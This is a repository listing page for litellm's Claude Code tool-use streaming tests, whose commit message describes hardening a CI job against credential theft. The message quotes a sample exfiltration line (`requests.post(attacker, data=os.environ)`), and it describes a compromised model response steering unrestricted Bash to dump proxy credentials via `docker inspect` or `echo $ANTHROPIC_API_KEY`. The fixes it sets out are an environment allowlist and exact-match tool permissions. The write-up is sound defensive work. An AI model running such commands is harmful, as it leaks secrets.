litellm/tests/claude_code/tool_use_streaming
Cursor Agent 83ea86718b
fix(ci): scrub pytest env + narrow Bash tool-use to exact echo pong
Address two new Veria comments (2026-05-18T00:10:41Z) on the
claude_code_compat_pr_gate job:

1. .circleci/config.yml (Veria: provider credentials exposed to PR code)

   The pytest step runs PR-controlled test code (anything under
   tests/claude_code/) and the CircleCI job env carries the provider
   creds used to start the proxy container. A malicious PR could add
   `requests.post(attacker, data=os.environ)` to any test or
   conftest hook and exfiltrate ANTHROPIC_API_KEY / AWS_* /
   VERTEXAI_* / AZURE_FOUNDRY_* / GITHUB_TOKEN.

   Pytest only needs to talk to the proxy at localhost:4000, so the
   credentials are not legitimately required in pytest's env. Wrap
   the invocation in `env -i` with a minimal allowlist (PATH /
   HOME / USER / TERM / LANG / LC_ALL / TMPDIR + the four
   proxy/result-path vars pytest actually reads). Pinned by a new
   test in test_circleci_pr_gate_wiring.py so the scrub cannot
   silently regress.

2. tests/claude_code/{tool_use,tool_use_streaming,thinking_with_tool_use}
   (Veria: model-controlled Bash execution in CI)

   The three Bash-using feature directories passed `--allowed-tools
   Bash` unrestricted, which lets a compromised provider response
   choose any host command to run instead of `echo pong`. On the
   PR-gate machine executor that command could `docker inspect
   compat-proxy` to dump provider creds from the proxy container.

   Tighten every Bash-using cell (15 files total, 5 providers × 3
   feature dirs) to:

     - --allowed-tools 'Bash(echo pong)' — exact-match pattern per
       Claude Code's permission rule syntax. A different command
       does not match the allow rule.
     - --permission-mode dontAsk — auto-denies tool calls outside the
       allow rule instead of falling back to the headless default
       (which would defeat the explicit-allow contract).

   thinking_with_tool_use prompts are tightened to pin the command
   to 'echo pong' so the cell can run under the new restriction
   while still exercising the thinking + tool_use shape.

   Pinned by a new parametrized test (15 cells × 2 properties = 30
   cases) in test_bash_tool_restrictions.py.

The model-Bash mitigation is layered on top of the existing
cli_driver env allowlist (which already scrubs provider creds from
the CLI subprocess env, so even a malicious `echo $ANTHROPIC_API_KEY`
prints nothing) and the build-and-test branch filter (which keeps
external forks from running this job at all). It is not a substitute
for a fully sandboxed CLI runner; the residual risk of Claude Code's
built-in read-only `echo` auto-approve is documented in the per-cell
comments alongside the restriction.

All 223 tests/claude_code/ unit tests pass.

Co-authored-by: Cursor Agent <cursoragent@cursor.com>
2026-05-18 00:25:43 +00:00
..
__init__.py compat-matrix: parallel-fanout refactor + 5 new feature dirs + rate limiter 2026-05-06 23:31:19 +00:00
test_anthropic.py fix(ci): scrub pytest env + narrow Bash tool-use to exact echo pong 2026-05-18 00:25:43 +00:00
test_azure.py fix(ci): scrub pytest env + narrow Bash tool-use to exact echo pong 2026-05-18 00:25:43 +00:00
test_bedrock_converse.py fix(ci): scrub pytest env + narrow Bash tool-use to exact echo pong 2026-05-18 00:25:43 +00:00
test_bedrock_invoke.py fix(ci): scrub pytest env + narrow Bash tool-use to exact echo pong 2026-05-18 00:25:43 +00:00
test_vertex_ai.py fix(ci): scrub pytest env + narrow Bash tool-use to exact echo pong 2026-05-18 00:25:43 +00:00